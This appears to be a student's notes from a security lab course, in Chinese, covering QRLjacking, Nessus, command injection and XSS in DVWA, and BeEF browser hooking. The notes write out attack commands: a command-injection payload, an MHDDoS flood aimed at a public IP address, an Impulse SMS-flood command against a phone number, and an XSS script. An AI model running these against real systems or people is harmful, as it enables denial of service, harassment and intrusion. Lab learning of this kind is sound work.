0304實習課 1.QRIJackking實作 先去kali裡面把QRLjacking的套件從github上下載下來  cd到QRL子目錄後按下LS查看,會看到requirement.txt 檔案,把她打開(指令為:pip install -r requirements.txt)  但要注意我們做這個之前要先更新火狐, 更新指令為sudo apt update/sudo apt list --upgradable  2.更新好之後我們就可以使用剛剛的geckodriver了 一樣先去github把套件安裝下來  抓下來之後我們就要進去超級管理員裡面把打開qrljacker.py 指令依序是sudo su/chmod +x geckodriver 最後在依據下述的指令就可以成功進入了!  進入的畫面每個人都不一樣 但只要有出現這個圖示就代表你成功了  想知道有哪些指令可以用help,下圖是他可以使用的指令的下半部。 同時也要確認是否是selenium 4.10 以下的版本,要不然會有問題  下圖示仍有問題的截圖畫面  0318實習(由於Nessus之後業師有更詳細的解釋,這邊只大略提一些) 先去Nessus官方下載(要注意版本要是Linux - Debian - amd64)  到下載的資料夾中查看版本(粉色的那個)  並且要記得進入超級管理員模式才可以開始執行安裝 指令(sudo su/cd Downloads/ls) 進入後再輸入該指令即可安裝 dpkg -i Nessus-10.7.1-debian10_amd64.deb  沒反應的話再輸入此資訊就可以進入nessus /bin/systemctl start nessusd.service  此為nessus的登入畫面,之後在業師講解時會再有更多更新。  0328正課 1.DVMA操作與實作 安裝好後要打開DOCKER的DVWA,再前往網站http://localhost:4280 登入admin/password 圖1. ping127.0.0.1 . 以;座分隔,ls查看目錄內容  mkdir 0320增加名為0320的物件  127.0.0.1&& cat index.php 輸入該指令會可以將檔案輸出至畫面  指令練習 type(打開文字檔)  刪除文檔  dir 打開目錄  顯示系統資訊  顯示或修改指定檔案上的判別存取控制清單  tasklist檢查本機或遠端 server 上正在執行的程序   2.COMMAND INJECTION介紹 Command Injection(命令注入弱點)是一種常見的網頁注入攻擊行為,若管理者未在網站的輸入表單中正確過濾敏感字元,攻擊者有則可能透過這些進入點,將指令傳送至Server本機中執行後,再將執行結果透過動態網頁語言輸出,藉此獲取機敏資訊或執行未經授權的任意指令。 0325實習是助教針對還沒完成nessus安裝的同學再一次的提醒跟基礎講解,一樣我們等之後的業師一併講解。 0429實習課~DDOS攻擊測試[https://github.com/MatrixTM/MHDDoS] 1.到github前往安裝套件並開啟(之前必須先確認自己的docker是否安裝完成) 有三行指令需要完成 (git clone https://github.com/MatrixTM/MHDDoS.git/) (cd MHDDoS) (pip install -r requirements.txt)  好了之後即可輸入python3 start.py來啟動該服務   最後在terminal中輸入攻擊的指令start.py GET http://37.187.56.77 1 10000 sock.txt 1000 10000  最後一張圖是指該網站被攻擊後所呈現的樣子  0506實習 Impulse 安裝 進入kali 打開火狐並輸入網址https://github.com/LimerBoy/Impulse 來執行  根據他下面的下載輸入以下指令 sudo apt update sudo apt install python3 python3-pip git -y cd Impulse pip3 install -r requirements.txt git clone https://github.com/LimerBoy/Impulse    當你成功進去impulse後,輸入範例的攻擊指令 python3 impulse.py –method SMS –time 20 –threads 15 –target +380123456789  接下來是與5/20實習課有關的操作 beef的滲透與測試 首先要記得先打開terminal 進入超級管理員模式 sudo su 接著下載beef-xss(指令apt install beef-xss) 當你下載好之後請關掉terminal 並且執行(sudo beef-xss)會看到他給你一串網址,請打開網址後便會進入ui介面  為避免帳號密碼記不得 我就用beef/kali作為我的帳號密碼 此為登入後的畫面  再來我們要打開我們的DVWA (打開TERMINAL docker run --rm -it -p 8080:80 kaakaww/dvwa-docker:latest)註 請不要直接複製貼上,要不然會遇到權限問題  確認後DVWA是最基礎的安全LEVEL之後請到 XSS(Reflected) 並輸入[<script>alert("xss")</script>] 當他跟你說hello的時候代表歐虧了  來到terminal_beef那邊看到Hook,把它複製下來貼在XSS(STORE)上 再來去TERMINAL那邊ifconfig獲取自己的ip位置,把ip改成自己的 但當你想這麼做的時候發現不行,因為XSS(STORE)的Message裡面限制你只能輸入50個字  為了解決這個問題,我們去ctrl+shift+I 來打開網頁開發者工具 把字改成100就好  會發現已經可以輸入了!再按下sign  回到beef中你會發現左邊多了一個剛剛從dvwa建立的東東  打開social engineering 測試Fake Notification Bar  按下network圖示 代表他已經連上去了 恭喜完成! 
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up